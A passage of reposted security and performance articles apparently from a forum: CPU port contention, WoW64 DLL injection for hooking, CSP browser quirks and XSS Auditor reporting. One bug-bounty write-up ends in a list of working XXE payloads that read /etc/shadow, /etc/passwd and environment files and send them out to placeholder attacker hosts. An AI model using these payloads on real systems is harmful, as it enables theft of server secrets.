  15. Understanding CPU port contention. 21 Mar 2018 I continue writing about performance of the processors and today I want to show some examples of issues that can arise in the CPU backend. In particular today’s topic will be CPU ports contention. Modern processors have multiple execution units. For example, in SandyBridge family there are 6 execution ports: Ports 0,1,5 are for arithmetic and logic operations (ALU). Ports 2,3 are for memory reads. Port 4 is for memory write. Today I will try to stress this side of my IvyBridge CPU. I will show when port contention can take place, will present easy to understand pipeline diagramms and even try IACA. It will be very interesting, so keep on reading! Disclaimer: I don’t want to describe some nuances of IvyBridge achitecture, but rather to show how port contention might look in practice. Utilizing full capacity of the load instructions In my IvyBridge CPU I have 2 ports for executing loads, meaning that we can schedule 2 loads at the same time. Let’s look at first example where I will read one cache line (64 in portions of 4 bytes. So, we will have 16 reads of 4 bytes. I make reads within one cache-line in order to eliminate cache effects. I will repeat this 1000 times: max load capacity ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] dec edi jnz .loop I think there will be no issue with loading values in the same eax register, because CPU will use register renaming for solving this write-after-write dependency. Performance counters that I use UOPS_DISPATCHED_PORT.PORT_X - Cycles when a uop is dispatched on port X. UOPS_EXECUTED.STALL_CYCLES - Counts number of cycles no uops were dispatched to be executed on this thread. UOPS_EXECUTED.CYCLES_GE_X_UOP_EXEC - Cycles where at least X uops was executed per-thread. Full list of performance counters for IvyBridge can be found here. Results I did my experiments on IvyBridge CPU using uarch-bench tool. Benchmark Cycles UOPS.PORT2 UOPS.PORT3 UOPS.PORT5 max load capacity 8.02 8.00 8.00 1.00 We can see that our 16 loads were scheduled equally between PORT2 and PORT3, each port takes 8 uops. PORT5 takes MacroFused uop appeared from dec and jnz instruction. The same picture can be observed if use IACA tool (good explanation how to use IACA): Architecture - IVB Throughput Analysis Report -------------------------- Block Throughput: 8.00 Cycles Throughput Bottleneck: Backend. PORT2_AGU, Port2_DATA, PORT3_AGU, Port3_DATA Port Binding In Cycles Per Iteration: ------------------------------------------------------------------------- | Port | 0 - DV | 1 | 2 - D | 3 - D | 4 | 5 | ------------------------------------------------------------------------- | Cycles | 0.0 0.0 | 0.0 | 8.0 8.0 | 8.0 8.0 | 0.0 | 1.0 | ------------------------------------------------------------------------- N - port number or number of cycles resource conflict caused delay, DV - Divider pipe (on port 0) D - Data fetch pipe (on ports 2 and 3), CP - on a critical path F - Macro Fusion with the previous instruction occurred | Num Of | Ports pressure in cycles | | | Uops | 0 - DV | 1 | 2 - D | 3 - D | 4 | 5 | | --------------------------------------------------------------------- | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x4] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x8] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0xc] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x10] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x14] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x18] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x1c] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x20] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x24] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x28] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x2c] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x30] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x34] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x38] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x3c] | 1 | | | | | | 1.0 | | dec rdi | 0F | | | | | | | | jnz 0xffffffffffffffbe Total Num Of Uops: 17 Why we have 8 cycles per iteration? On modern x86 processors load instruction takes at least 4 cycles to execute even the data is in the L1-cache. Although according to Agner’s instruction_tables.pdf it has 2 cycles latency. Even if we would have latency of 2 cycles we would have (16 [loads] * 2 [cycles]) / 2 [ports] = 16 cycles. According to this calculations we should receive 16 cycles per iteration. But we are running at 8 cycles per iteration. Why this happens? Well, like most of execution units, load units are also pipelined, meaning that we can start second load while first load is in progress on the same port. Let’s draw a simplified pipeline diagram and see what’s going on. This is simplified MIPS-like pipeline diagram, where we usually have 5 pipeline stages: F(fetch) D(decode) I(issue) E(execute) or M(memory operation) W(write back) It is far from real execution diagram of my CPU, however, I preserved some important constraints for IvyBridge architecture (IVB): IVB front-end fetches 16B block of instructions in a 16B aligned window in 1 cycle. IVB has 4 decoders, each of them can decode instructions that consist at least of a single uop. IVB has 2 pipelined units for doing load operations. Just to simplify the diagrams I assume load operation takes 2 cycles. M1 and M2 stage reflect that in the diagram. It just need to be said that I omitted one important constraint. Instructions always retire in program order, in my later diagrams it’s broken (I simply forgot about it when I was making those diagrams). Drawing such kind of diagrams usually helps me to understand what is going on inside the processor and finding different sorts of hazards. Some explanations for this pipeline diagram In first cycle we fetch 4 loads. We can’t fetch LOAD5, because it doesn’t fit in the same 16B aligned window as first 4 loads. In second cycle we were able to decode all 4 fetched instructions, because they all are single-uop instructions. In third cycle we were able to issue only first 2 loads. One of such load goes to PORT2, the second goes to PORT3. Notice, that LOAD3 and LOAD4 are stalled (typically waiting in Reservation Station). Only in cycle #4 we were able to issue LOAD3 and LOAD4, because we know M1 stages will be free to use in next cycle. Continuing this diagram further we could see that in each cycle we are able to retire 2 loads. We have 16 loads, so that explains why it takes only 8 cycles per iteration. I made additional experiment to prove this theory. I collected some more performance counters: Benchmark Cycles CYCLES_GE_3_UOP_EXEC CYCLES_GE_2_UOP_EXEC CYCLES_GE_1_UOP_EXEC max load capacity 8.02 1.00 8.00 8.00 Results above show that in each of 8 cycles (that it took to execute one iteration) at least 2 uops were issued (two loads issued per cycle). And in one cycle we were able to issue 3 uops (last 2 loads + dec-jnz pair). Conditional branches are executed on PORT5, so nothing prevents us from scheduling it in parrallel with 2 loads. What is even more interesting is that if we do simulation with assumption that load instruction takes 4 cycles latency, all the conclusions in this example will be still valid, because the throughput is what matters (as Travis mentioned in his comment). There will be still 2 retired load instructions each cycle. And that would mean that our 16 loads (inside each iteration) will retire in 8 cycles. Utilizing other available ports in parallel In the example that I presented, I’m only utilizing PORT2 and PORT3. And partailly PORT 5. What does that mean? Well, it means that we can schedule instructions on another ports in parrallel with loads just for free. Let’s try to write such an example. I added after each pair of loads one bswap instruction. This instruction reverses the byte order of a register. It is very helpful for doing big-endian to little-endian conversion and vice-versa. There is nothing special about this instruction, I just chose it because it suites best to my experiments. According to Agner’s instruction_tables.pdf bswap instruction on a 32-bit register is executed on PORT1 and has 1 cycle latency. max load capacity + 1 bswap ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] bswap ebx mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] bswap ebx mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] bswap ebx mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] bswap ebx mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] bswap ebx mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] bswap ebx mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] bswap ebx mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] bswap ebx dec edi jnz .loop Here are the results for such experiment: Benchmark Cycles UOPS.PORT1 UOPS.PORT2 UOPS.PORT3 UOPS_PORT5 max load capacity + 1 bswap 8.03 8.00 8.01 8.01 1.00 First observation is that we get 8 more bswap instructions just for free (we are running still at 8 cycles per iteration), because they do not contend with load instructions. Let’s look at the pipeline diagram for this case: We can see that all bswap instructions nicely fit into the pipeline causing no hazards. Overutilizing ports Modern compilers will try to schedule instructions for particular target architecture to fully utilize all execution ports. But what happens when we try to schedule too much instruction for some execution port? Let’s see. I added one more bswap instruction after each pair of loads: port 1 throughput bottleneck ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] bswap ebx bswap ecx mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] bswap ebx bswap ecx mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] bswap ebx bswap ecx mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] bswap ebx bswap ecx mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] bswap ebx bswap ecx mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] bswap ebx bswap ecx mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] bswap ebx bswap ecx mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] bswap ebx bswap ecx dec edi jnz .loop When I measured result using uarch-bench tool here is what I received: Benchmark Cycles UOPS.PORT1 UOPS.PORT2 UOPS.PORT3 UOPS_PORT5 port 1 throughput bottleneck 16.00 16.00 8.01 8.01 1.00 To understand why we now run at 16 cycles per iteration, it’s best to look at the pipeline diagram again: Now it’s clear to see that we have 16 bswap instructions and only one port that can handle this kind of instructions. So, we can’t go faster than 16 cycles in this case, because IVB processor executes them sequentially. Different architectures might have more ports to handle bswap instructions which may allow them to run faster. By now I hope you understand what port contention is and how to reason about such issues. Know limitations of your hardware! Additional resources More detailed information about execution ports of your processor can be found in Agner’s microarchitecture.pdf and for Intel processors in Intel’s optimization manual. All the assembly examples that I showed in this article are available on my github. UPD 23.03.2018 Several people mentioned that load instructions can’t have 2 cycles latency on modern Intel Architectures. Agner’s tables seems to be not accurate there. I will not redo the diagrams as it will be difficult to understand them, and they will shift the focus from the actual thing I wanted to explain. Again, I didn’t want to reconstruct how the pipeline diagram will look in reality, but rather to explain the notion of port contention. However, I totally accept the comment and it should mentioned. But also if we assume that load instruction takes 4 cycles latency in those examples, all the conclusions in the post are still valid, because the throughput is what matters (as Travis mentioned in his comment). There will be still 2 retired load instructions per cycle. Another important thing to mention is that hyperthreading helps utilize execution “slots”. See more details in HackerNews comments. Sursa: https://dendibakh.github.io/blog/2018/03/21/port-contention
  16. DEEP HOOKS: MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS – PART 1 By Yarden Shafir and Assaf Carlsbad - March 12, 2018 Introduction This blog post is the first in a three-part series describing the challenges one has to overcome when trying to hook the native NTDLL in WoW64 applications (32-bit processes running on top of a 64-bit Windows platform). As documented by numerous other sources, WoW64 processes contain two versions of NTDLL. The first is a dedicated 32-bit version, which forwards system calls to the WoW64 environment, where they are adjusted to fit the x64 ABI. The second is a native 64-bit version, which is called by the WoW64 environment and is eventually responsible for user-mode to kernel-mode transitions. Due to some technical difficulties in hooking the 64-bit NTDLL, most security-related products hook only 32-bit modules in such processes. Alas, from an attacker’s point of view, bypassing these 32-bit hooks and the mitigations offered by them is rather trivial with the help of some well-known techniques. Nonetheless, in order to invoke system calls and carry out various other tasks, most of these techniques would eventually call the native (that is, 64-bit) version of NTDLL. Thus, by hooking the native NTDLL, endpoint protection solutions can gain better visibility into the process’ actions and become somewhat more resilient to bypasses. In this post we describe methods to inject 64-bit modules into WoW64 applications. The next post will take a closer look at one of these methods and delve into the details of some of the adaptations required for handling CFG-aware systems. The final post of this series will describe the changes one would have to apply to an off-the-shelf hooking engine in order to hook the 64-bit NTDLL. When we started this research, we decided to focus our efforts mainly on Windows 10. All of the injection methods we present were tested on several Windows 10 versions (mostly RS2 and RS3), and may require a slightly different implementation if used on older Windows versions. Injection Methods Injecting 64-bit modules into WoW64 applications has always been possible, though there are a few limitations to consider when doing so. Normally, WoW64 processes contain very few 64-bit modules, namely the native ntdll.dll and the modules comprising the WoW64 environment itself: wow64.dll, wow64cpu.dll, and wow64win.dll. Unfortunately, 64-bit versions of commonly used Win32 subsystem DLLs (e.g. kernelbase.dll, kernel32.dll, user32.dll, etc.) are not loaded into the process’ address space. Forcing the process to load any of these modules is possible, though somewhat difficult and unreliable. Hence, as the first step of our journey towards successful and reliable injection, we should strip our candidate module of all external dependencies but the native NTDLL. At the source code level, this means that calls to higher-level Win32 APIs such as VirtualProtect() will have to be replaced with calls to their native counterparts, in this case – NtProtectVirtualMemory(). Other adaptations are also required and will be discussed in detail in the final part of this series. Figure 1 – a minimalistic DLL with only a single import descriptor (NTDLL) After we create a 64-bit DLL that adheres to these limitations, we can go on to review a few possible injection methods. Hijacking wow64log.dll As previously discovered by Walied Assar, upon initialization, the WoW64 environment attempts to load a 64-bit DLL, named wow64log.dll directly from the system32 directory. If this DLL is found, it will be loaded into every WoW64 process in the system, given that it exports a specific, well-defined set of functions. Since wow64log.dll is not currently shipped with retail versions of Windows, this mechanism can actually be abused as an injection method by simply hijacking this DLL and placing our own version of it in system32. Figure 2 – ProcMon capture showing a WoW64 process attempting to load wow64log.dll The main advantage of this method lies in its sheer simplicity – All it takes to inject the module is to deploy it to the aforementioned location and let the system loader do the rest. The second advantage is that loading this DLL is a legitimate part of the WoW64 initialization phase, so it is supported on all currently available 64-bit Windows platforms. However, there are a few possible downsides to this method: First, a DLL named wow64log.dll may already exist in the system32 directory, even though (as mentioned above) it’s not there by default. Second, this method provides little to no control over the injection process as the underlying call to LdrLoadDll() is ultimately issued by system code. This limits our ability to exclude certain processes from injection, specify when the module will be loaded, etc. Heaven’s Gate More control over the injection process can be achieved by simply issuing the call to LdrLoadDll()ourselves rather than letting a built-in system mechanism call it on our behalf. In reality, this is not as straightforward as it may seem. As one can correctly assume, the 32-bit image loader will refuse any attempt to load a 64-bit image, stopping this course of action dead in its tracks. Therefore, if we wish to load a native module into a WoW64 process we must somehow go through the native loader. We can do this in two stages: Gain the ability to execute arbitrary 32-bit code inside the target process. Craft a call to the 64-bit version of LdrLoadDll(), passing the name of the target DLL as one of its arguments. Given the ability to execute 32-bit code in the context of the target process (for which a plethora of ways exist), we still need a method by which we can call 64-bit APIs freely. One way to do this is by utilizing the so-called “Heaven’s Gate”. “Heaven’s Gate” is the commonly used name for a technique which allows 32-bit binaries to execute 64-bit instructions, without going through the standard flow enforced by the WoW64 environment. This is usually done via a user-initiated control transfer to code segment 0x33, that switches the processor’s execution mode from 32-bit compatibility mode to 64-bit long mode. Figure 3 – a thread executing x86 code, just prior to its transition to x64 realm. After the jump to the x64 realm is made, the option of directly calling into the 64-bit NTDLL becomes readily available. In the case of exploits and other potentially malicious programs, this allows them to avoid hitting hooks placed on 32-bit APIs. In the case of DLL injectors, though, this solves the problem at hand as it opens up the possibility of calling the 64-bit version of LdrLoadDll(), capable of loading 64-bit modules. Figure 4 – for demonstration purposes, we used the Blackbone library to successfully inject a 64-bit module into a WoW64 process using Heaven’s Gate. We will not go into any more detail about specific implementations of “Heaven’s Gate”, but the inquisitive reader can learn more about it here. Injection via APC With the ability to load a kernel-mode driver into the system, the arsenal of injection methods at our disposal grows significantly. Among these methods, the most popular is probably injection via APC: It is used extensively by some AV vendors, malware developers and presumably even by the CIA. In a nutshell, an APC (Asynchronous Procedure Call) is a kernel mechanism that provides a way to execute a custom routine in the context of a particular thread. Once dispatched, the APC asynchronously diverts the execution flow of the target thread to invoke the selected routine. APCs can be classified as one of two major types: Kernel-mode APCs: The APC routine will eventually execute kernel-mode code. These are further divided into special kernel-mode APCs and normal kernel-mode APCs, but we will not go into detail about the nuances separating them. User-mode APCs: The APC routine will eventually execute user-mode code. User-mode APCs are dispatched only when the thread owning them becomes alertable. This is the type of APC we’ll be dealing with in the rest of this section. APCs are mostly used by system-level components to perform various tasks (e.g. facilitate I/O completion), but can also be harnessed for DLL injection purposes. From the perspective of a security product, APC injection from kernel-space provides a convenient and reliable method of ensuring that a particular module will be loaded into (almost) every desired process across the system. In the case of the 64-bit NT kernel, the function responsible for the initial dispatch of user-mode APCs (for native 64-bit processes as well as WoW64 processes) is the 64-bit version of KiUserApcDispatcher(), exported from the native NTDLL. Unless explicitly requested otherwise by the APC issuer (via PsWrapApcWow64Thread()) the APC routine itself will also execute 64-bit code, and thus will be able to load 64-bit modules. The classic way of implementing DLL injection via APC revolves around the use of a so-called “adapter thunk”. The adapter thunk is a short snippet of position-independent code written to the address space of the target process. Its main purpose is to load a DLL from the context of a user-mode APC, and as such it will receive its arguments according to the KNORMAL_ROUTINE specification: Figure 5 – the prototype of a user-mode APC procedure, taken from wdm.h As can be seen in the figure above, functions of type KNORMAL_ROUTINE receive three arguments, the first of which is NormalContext. Like many other “context” parameters in the WDM model, this argument is actually a pointer to a user-defined structure. In our case, we can use this structure to pass the following information into the APC procedure: The address of an API function used to load a DLL. In WoW64 processes this has to be the native LdrLoadDll(), as the 64-bit version of kernel32.dll is not loaded into the process so using LoadLibrary() and its variants is not possible. The path to the DLL we wish to load into the process. Once the adapter thunk is called by KiUserApcDispatcher(), it unpacks NormalContext and issues a call to the supplied loader function with the given DLL path and some other, hardcoded arguments: Figure 6 – A typical “adapter thunk” set as the target of a user-mode APC To use this technique to our benefit, we wrote a standard kernel-level APC injector and modified it in a way that should support injection of 64-bit DLLs into WoW64 processes (shown in Appendix A ). Albeit promising, when attempting to inject our DLL into any CFG-aware WoW64 process, the process crashed with a CFG validation error. Figure 7 – A CFG validation error caused by the attempt to call the adapter thunk Next Post: In the next post we will delve into some of the implementation details of CFG to help grasp why this injection method fails, and present several possible solutions to overcome this obstacle. Appendixes Appendix A – complete source code for APC injection with adapter thunk Sursa: https://www.sentinelone.com/blog/deep-hooks-monitoring-native-execution-wow64-applications-part-1/
  17. Posted on March 24, 2018 by tghawkins Today, I’d like to share my methodology behind how I found a blind, out of band xml external entities attack in a private bug bounty program. I have redacted the necessary information to hide the program’s identity. As with the beginning of any hunter’s quest, thorough recon is necessary to identify as many in-scope assets as possible. Through this recon, I was able discover a subdomain that caught my interest. I then brute forced the directories of the subdomain, and found the endpoint /notifications. Visiting this endpoint via a GET request resulted in the following page: I noticed in the response, the xml content-type along with an xml body containing XML SOAP syntax. Since I had no GET parameters to test, I decided to issue a POST request to the endpoint, finding that the body of the response had disappeared, with a response code of 200. Since the web application seemed to be responding well to the POST request, instead of the issuing a 405 Method Not Allowed error, I decided to issue a request containing xml syntax with the content-type: application/xml. The resulting response was also different than in the previous cases. This response was also in XML as it was when issuing the GET request to this endpoint. However this time, within the tags is the value “OK” instead of the original value “TestRequestCalled”. I also tried to send a json request to see how the application would respond. Below is the result. Seeing as how the response was blank, as it was when issuing a POST request with no specified content type, I had a strong belief that the endpoint was processing XML data. This was enough for me to an set up my VPS to host a DTD file for the XML processor to “hopefully” parse. Below is the result of the dtd being successfully processed, with the requested file contents appended. I also used this script: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb to set up, and have an ftp server listening so I would also be able to extract the server’s information/file contents through the ftp protocol: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb Although this submission was marked as a duplicate, I wanted to share this finding as it was a good learning experience, and I was able to examine how the application was responding to certain inputs without knowing its exact purpose/functionality. The original reporter had not been able to extract information from the server, and received $8k for this issue. Some helpful XXE payloads: -------------------------------------------------------------- Vanilla, used to verify outbound xxe or blind xxe -------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> ]> <r>&sp;</r> --------------------------------------------------------------- OoB extraction --------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; ]> <r>&exfil;</r> ## External dtd: ## <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> ---------------------------------------------------------------- OoB variation of above (seems to work better against .NET) ---------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; %exfil; ]> ## External dtd: ## <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> --------------------------------------------------------------- OoB extraction --------------------------------------------------------------- <?xml version="1.0"?> <!DOCTYPE r [ <!ENTITY % data3 SYSTEM "file:///etc/shadow"> <!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd"> %sp; %param3; %exfil; ]> ## External dtd: ## <!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>"> ----------------------------------------------------------------------- OoB extra ERROR -- Java ----------------------------------------------------------------------- <?xml version="1.0"?> <!DOCTYPE r [ <!ENTITY % data3 SYSTEM "file:///etc/passwd"> <!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd"> %sp; %param3; %exfil; ]> <r></r> ## External dtd: ## <!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external; ----------------------------------------------------------------------- OoB extra nice ----------------------------------------------------------------------- <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % start "<![CDATA["> <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml "> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://evil/evil.xml"> %dtd; ]> <root>&all;</root> ## External dtd: ## <!ENTITY all "%start;%stuff;%end;"> ------------------------------------------------------------------ File-not-found exception based extraction ------------------------------------------------------------------ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" > %one; %two; %four; ]> ## External dtd: ## <!ENTITY % three SYSTEM "file:///etc/passwd"> <!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> -------------------------^ you might need to encode this % (depends on your target) as: &#x25; -------------- FTP -------------- <?xml version="1.0" ?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd"> %asd; %c; ]> <a>&rrr;</a> ## External dtd ## <!ENTITY % d SYSTEM "file:///proc/self/environ"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> --------------------------- Inside SOAP body --------------------------- <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> --------------------------- Untested - WAF Bypass --------------------------- <!DOCTYPE :. SYTEM "http://" <!DOCTYPE :_-_: SYTEM "http://" <!DOCTYPE {0xdfbf} SYSTEM "http://" view rawXXE_payloads hosted with by GitHub Sursa: https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/
  18. Stefan Matsson 2018-03-26 # Security CSP IMPLEMENTATIONS ARE BROKEN TL;DR frame-src is inconsistent cross browser block-all-mixed-content is broken in Chrome and Opera CSP reports are inconsitent Edge has some weird edge cases (no pun intended) INTRO There has been a lot of talk lately about Content Security Policy (CSP) after an accessibility script called BrowseAloud got infected by a cryptominer and force the users of a couple of thousand websites to mine cryptocurrency without their knowledge. Content Security Policy could have prevented this issue as it contains rules for what the browser can load and what not to load. Read more at https://content-security-policy.com I recently held a talk with the title “Content Security Policy - Or how we ruined our site, learned a lesson, broke the site again and then fixed it”. This talk was based on my work at my current client. This post is sort of a summary of that talk and will outline some of the issues we found in different browsers and with different combinations of devices, OSs, browsers, extensions and whatnot. SOME INFO ON THE SYSTEM WE ARE BUILDING My client provides payment services for e-commerce. The system will be loaded as an iframe on the e-commerce site and allows the customer to finish their purchase. We use features in CSP that require us to use CSP2 (e.g. script hashes). Our system in turn loads an iframe from a trusted service provider (let’s call it SystemX). SystemX will in some cases redirect to one of their trusted providers. SystemX has literaly hundreds of trusted providers all over the world and each of these have their own page that must be loaded in the iframe. I will not go into more details on why to not reveal to much information about my client. FRAME-SRC IS INCONSISTENT CROSS BROWSER If your CSP contains a frame-src that does not contain mailto: or tel: these links will be blocked inside the iframe except in Firefox and Edge. Firefox will open both links and Edge will open the mailto link but block the tel link. I’m not really sure if it’s broken in Firefox or in the other browsers. There are valid arguments for both cases. Workaround: Add mailto: and tel: to your CSP: frame-src 'self' mailto: tel: I have reported this to Microsoft but have not heard back. Affected browsers: Firefox and Edge or all others depending on your point of view Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-links-frame-src/ EDGE AND CUSTOM ERROR PAGES We load an iframe from a trusted service provider which in turn redirects to different sites depending on circumstances. As we cannot know what URLs will be redirected to we currenty use this frame-src in our CSP: frame-src 'self' data: https: The issue with Edge is that it will load custom error pages for issues such as DNS errors, SmartScreen blocking and error responses from the server (e.g. 400, 404, 500 etc). The error page is loaded via a ms-appx-web:// url (e.g ms-appx-web:///assets/errorpages/http_500.htm) which is blocked by the CSP and a blank page is displayed to the user. The result is that our service provider’s iframe is just blank if an error occurrs. I have reported this issue to Microsoft in early March but have not heard anything back from them. Workaround: Add ms-appx-web: to our frame-src: frame-src 'self' data: https: ms-appx-web: Affected browsers: Edge Proof of concept: https:/jellyhive.github.io/CspImplementationsAreBroken/edge-ms-appx-web-frame-src/ EDGE AND EXTENSIONS Extensions installed in Edge are subject to the current page’s content security policy. Basically all installed extensions that try to do anything from loading images to JS will fail and a CSP violation will be logged. According to the CSP spec this is wrong. The issue has been fixed but not yet released according to the Edge issue tracker (issue 1132012). Affected browsers: Edge BLOCK-ALL-MIXED-CONTENT BLOCKS TEL AND MAILTO LINKS IN IFRAMES BUT NOT IN THE PARENT PAGE If you serve your site using HTTPS and use the block-all-mixed-content directive in your CSP, mailto and tel links will be blocked inside iframes but not on your main page. This does not happen if you serve the site using HTTP. If the user tries to click a mailto or tel link on your page (i.e. the parent page) it will work as intended. Clicking the same links in an iframe will log one of these two errors: Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'mailto:...'. This request has been blocked; the content must be served over HTTPS. Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'tel:...'. This request has been blocked; the content must be served over HTTPS. This issue has been reported to Google and Opera. Opera has not yet responded. Workaround: Remove block-all-mixed-content from your CSP (possibly use upgrade-insecure-requests instead) Affected browsers: Chrome and Opera Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-link-block-all-mixed-content/ SAFARI ON OLDER IOS DEVICES DOES NOT SUPPORT CSP2 “Older” in this case meaning iOS 9 or earlier. Safari on iOS 10 and 11 do support CSP2. Since we require the use of script hashes we also require CSP2. Desktop Safari is also affected is not as big of a problem as most desktops are up to date. Current usage on our site is less than 0.9% for older Safari on desktop. Workaround: There is no way to make this work so we have disabled CSP for older iOS devices using user agent sniffing. Affected browsers: Safari on iOS < 10 (both iPhone and iPad) and Safari 9 or earlier on desktop INTERNET EXPLORER 11 ONLY SUPPORTS X-CONTENT-SECURITY-POLICY AND CSP1 IE11 supports CSP1 using the X-Content-Security-Policy. If you wish to support IE11 you need to either do some user agent sniffing and change the header from Content-Security-Policy to X-Content-Security-Policy or send out both headers for everyone. In our case we barely have any customers on IE11 so we just send out the regular Content-Security-Policy header which is then ignored by IE11. Affected browsers: Internet Explorer 11 (older versions does not support CSP) CSP REPORTS DIFFER BETWEEN BROWSERS The reports sent to your report-uri should follow a common standard defined in the CSP spec but browsers differ on what data they send. Some versions of Safari includes the entire CSP in the violated-directive property. This is like saying “Something went wrong. You find out what and deal with it.” Chrome on Android does sometimes not provide a blocked-uri when the violated-directive is frame-src. This means that we have no way of knowing what URL was blocked in the iframe. Most browsers does not provide a script-sample when an inline script is blocked. script-sample is very helpful in debugging what script was blocked. CSP REPORTS CONTAIN LOTS OF FALSE POSITIVES This is primarily due to browser extensions. Most extension work by injecting code on the page and code on the page is subject to the page’s CSP. A common issue we have found in our logs is violated-directive: script-src blocked-uri: about:blank which is casued by adblockers when they replace the loading of tracking scripts (e.g. Google Analytics) with the loading of about:blank. SUMMARY Content Security Policy is a great tool that should be deployed in more places. It does however take some fine tuning to make it work properly on a specific site. Sursa: https://jellyhive.com/activity/posts/2018/03/26/csp-implementations-are-broken/
  19. Introducing XSS Auditor reporting to Report URI March 26, 2018 Whilst we already have support for CSP reports over at Report URI, there is another potential source of information about XSS attacks that may be attempted or happening on your site. The X-XSS-Protection header allows you to configure the XSS Auditor, deem what action it should take and request that the auditor send reports if action is required. We now support XSS Auditor reporting on Report URI! The XSS Auditor The XSS Auditor runs whilst HTML is being parsed and attempts to find reflected XSS attacks against the user. If it finds a possible attack the Auditor can take no action, it can filter what it thinks is the attack payload or it can refuse to render the page at all. You can find more details about the XSS Auditor which is present in Chromium and WebKit so there is a good share of browsers that have one. Configuring the Auditor The default configuration for the XSS Auditor varies depending on which version of which browser you're using, of course, but configuring it is easy enough. You can control the auditor with the X-Xss-Protectionheader with a few simple values. You can read more detail about configuring the auditor in my blog post Hardening your HTTP response headers and you can test to see if your site, or any other site, has it deployed properly using securityheaders.io. No matter which configuration you use, as long as you have the auditor enabled, it can send reports about the action it takes. X-Xss-Protection: 1; mode=block; report=https://{subdomain}.report-uri.com/r/d/xss/enforce XSS Reports Whilst the original purpose of 